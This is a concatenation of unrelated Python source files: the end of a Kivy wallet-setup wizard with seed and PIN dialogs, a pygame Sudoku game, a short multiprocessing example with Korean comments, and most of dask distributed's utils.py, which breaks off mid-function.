kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
Suduko.py
|
import pygame
from GameClock import GameClock
from SudukoPuzzleMaker import SudukoPuzzleMaker
import pygame as pg
import threading as t
# Init
pg.init()
pg.font.init()
clock = GameClock()
# Window
WIN_WIDTH, WIN_HEIGHT = 500, 500
window = pg.display.set_mode((WIN_WIDTH, WIN_HEIGHT), pg.RESIZABLE)
pg.display.set_caption("Suduko")
NUM_SIZE = 30
TIME_BOX_SIZE = 50
GAP_X = window.get_width()// 9
GAP_Y = (window.get_height() - TIME_BOX_SIZE)// 9
BOARD_SIZE = (GAP_X * 9, GAP_Y*9)
OFF_SET_X = GAP_X // 2
OFF_SET_Y = GAP_Y // 2
selectBox_x = 0
selectBox_y = 0
font = pg.font.SysFont('Calibri', NUM_SIZE)
# PuzzleMaker
maker = SudukoPuzzleMaker()
maker.makeBoard()
board = maker.getBoard()
permission = []
GameOn = True
running = True
# Functions
def permissions():
global permission, board
permission = [[0 for i in range(9)] for i in range(9)]
for i in range(9):
for j in range(9):
if (board[i][j] == 0):
permission[i][j] = True
else:
permission[i][j] = False
permissions()
def drawGrid():
for i in range(10):
# vertical line
if (i % 3 == 0):
pg.draw.line(window, (255, 255, 255), (GAP_X * i, 0),(GAP_X * i, BOARD_SIZE[1]), 3)
pg.draw.line(window, (255, 255, 255), (0, GAP_Y * i), (BOARD_SIZE[0], GAP_Y * i), 3)
else:
pg.draw.line(window, (255, 255, 255), (GAP_X * i, 0),(GAP_X * i, BOARD_SIZE[1]), 1)
pg.draw.line(window, (255, 255, 255), (0, GAP_Y * i), (BOARD_SIZE[0], GAP_Y * i), 1)
def drawNumber():
for i in range(9):
for j in range(9):
num = board[i][j]
color = (255, 255, 255)
if (num != 0):
if permission[i][j]:
color = (255,0,255)
text = font.render(str(num), True, color)
textRect = text.get_rect()
textRect.center = (GAP_X * i + OFF_SET_X, GAP_Y * j + OFF_SET_Y)
window.blit(text, textRect)
def textBox(text:str, x:int, y:int, font:pg.font.SysFont, color):
render_text = font.render(text, True, color)
render_text_box = render_text.get_rect()
render_text_box.center = (x, y)
window.blit(render_text, render_text_box)
pg.display.update()
def UpdateTime():
textBox(clock.getTimeElapsed(), 300, BOARD_SIZE[1] + OFF_SET_Y, font, (255, 255, 255))
def selectBox(pos):
global selectBox_x, selectBox_y
mouse_x = pos[0]
mouse_y = pos[1]
selectBox_x, selectBox_y = (mouse_x // GAP_X) %9, (mouse_y // GAP_Y)% 9
def highlight_box():
global selectBox_x, selectBox_y
x, y = selectBox_x, selectBox_y
pygame.draw.lines(window, (0,255,0), True,
[(GAP_X*x, GAP_Y*y), (GAP_X*x, GAP_Y*(y+1)),
(GAP_X*(x+1), GAP_Y*(y+1)), (GAP_X *(x+1), GAP_Y*(y))], 5)
def key_function():
global GameOn, running,selectBox_x, selectBox_y
keys = pg.key.get_pressed()
if permission[selectBox_x][selectBox_y]:
if keys[pg.K_1]:
board[selectBox_x][selectBox_y] = 1
if keys[pg.K_2]:
board[selectBox_x][selectBox_y] = 2
if keys[pg.K_3]:
board[selectBox_x][selectBox_y] = 3
if keys[pg.K_4]:
board[selectBox_x][selectBox_y] = 4
if keys[pg.K_5]:
board[selectBox_x][selectBox_y] = 5
if keys[pg.K_6]:
board[selectBox_x][selectBox_y] = 6
if keys[pg.K_7]:
board[selectBox_x][selectBox_y] = 7
if keys[pg.K_8]:
board[selectBox_x][selectBox_y] = 8
if keys[pg.K_9]:
board[selectBox_x][selectBox_y] = 9
if keys[pg.K_DELETE]:
board[selectBox_x][selectBox_y] = 0
if keys[pg.K_ESCAPE]:
GameOn = False
running = False
def repetition(arr):
for i in range(len(arr)):
if arr[i] in arr[i+1:]:
return False
return True
def check():
while True:
# Check row
for i in range(9):
if repetition(board[i]):
print("Check some where wrong!")
for i in range(9):
if repetition([board[i][j] for j in range(9)]):
print("Check! some where wrong!")
def highlighting_box():
while True:
if (running):
highlight_box()
else:
break
selectionThread = t.Thread(target=highlighting_box)
selectionThread.start()
timeThread = t.Thread(target=clock.start)
timeThread.start()
while running:
for e in pg.event.get():
if e.type == pg.QUIT:
GameOn = False
running = False
if e.type == pg.VIDEORESIZE:
WIN_WIDTH, WIN_HEIGHT = window.get_width(), window.get_height()
NUM_SIZE = 30
TIME_BOX_SIZE = 50
GAP_X = window.get_width()// 9
GAP_Y = (window.get_height() - TIME_BOX_SIZE)// 9
BOARD_SIZE = (GAP_X * 9, GAP_Y*9)
OFF_SET_X = GAP_X // 2
OFF_SET_Y = GAP_Y // 2
if e.type == pg.MOUSEBUTTONDOWN:
selectBox(pg.mouse.get_pos())
if e.type == pg.KEYDOWN:
if e.key == pg.K_UP:
if (selectBox_y > 0): selectBox_y -= 1
if e.key == pg.K_DOWN:
if (selectBox_y < 8): selectBox_y += 1
if e.key == pg.K_RIGHT:
if (selectBox_x < 8) : selectBox_x += 1
if e.key == pg.K_LEFT:
if (selectBox_x > 0): selectBox_x -= 1
window.fill((0,0,0))
if GameOn:
drawGrid()
drawNumber()
key_function()
UpdateTime()
pg.display.flip()
pg.quit()
clock.stop()
|
basic_multiprocessing.py
|
"""
"멀티프로세싱"절 예시
`multiprocessing` 모듈을 이용해 새로운 프로세스들을
생성하는 방법을 설명한다.
"""
from multiprocessing import Process
import os
def work(identifier):
print(f'Hey, I am the process ' f'{identifier}, pid: {os.getpid()}')
def main():
processes = [Process(target=work, args=(number,)) for number in range(5)]
for process in processes:
process.start()
while processes:
processes.pop().join()
if __name__ == "__main__":
main()
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from collections.abc import Container, KeysView, ValuesView
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from contextvars import ContextVar
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from types import ModuleType
from typing import Any as AnyType
from typing import ClassVar
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from distributed.compatibility import WINDOWS
from distributed.metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
if method == "forkserver":
# Makes the test suite much faster
preload = ["distributed"]
from distributed.versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = error = future = None # set up non-locals
@gen.coroutine
def f():
nonlocal result, error, future
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
future = asyncio.ensure_future(future)
result = yield future
except Exception:
error = sys.exc_info()
finally:
e.set()
def cancel():
if future is not None:
future.cancel()
def wait(timeout):
try:
return e.wait(timeout)
except KeyboardInterrupt:
loop.add_callback(cancel)
raise
loop.add_callback(f)
if callback_timeout is not None:
if not wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
wait(10)
if error:
typ, exc, tb = error
raise exc.with_traceback(tb)
else:
return result
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from distributed.comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path: str):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import: list[str] = []
tmp_python_path: str | None = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded: list[ModuleType] = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def _iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
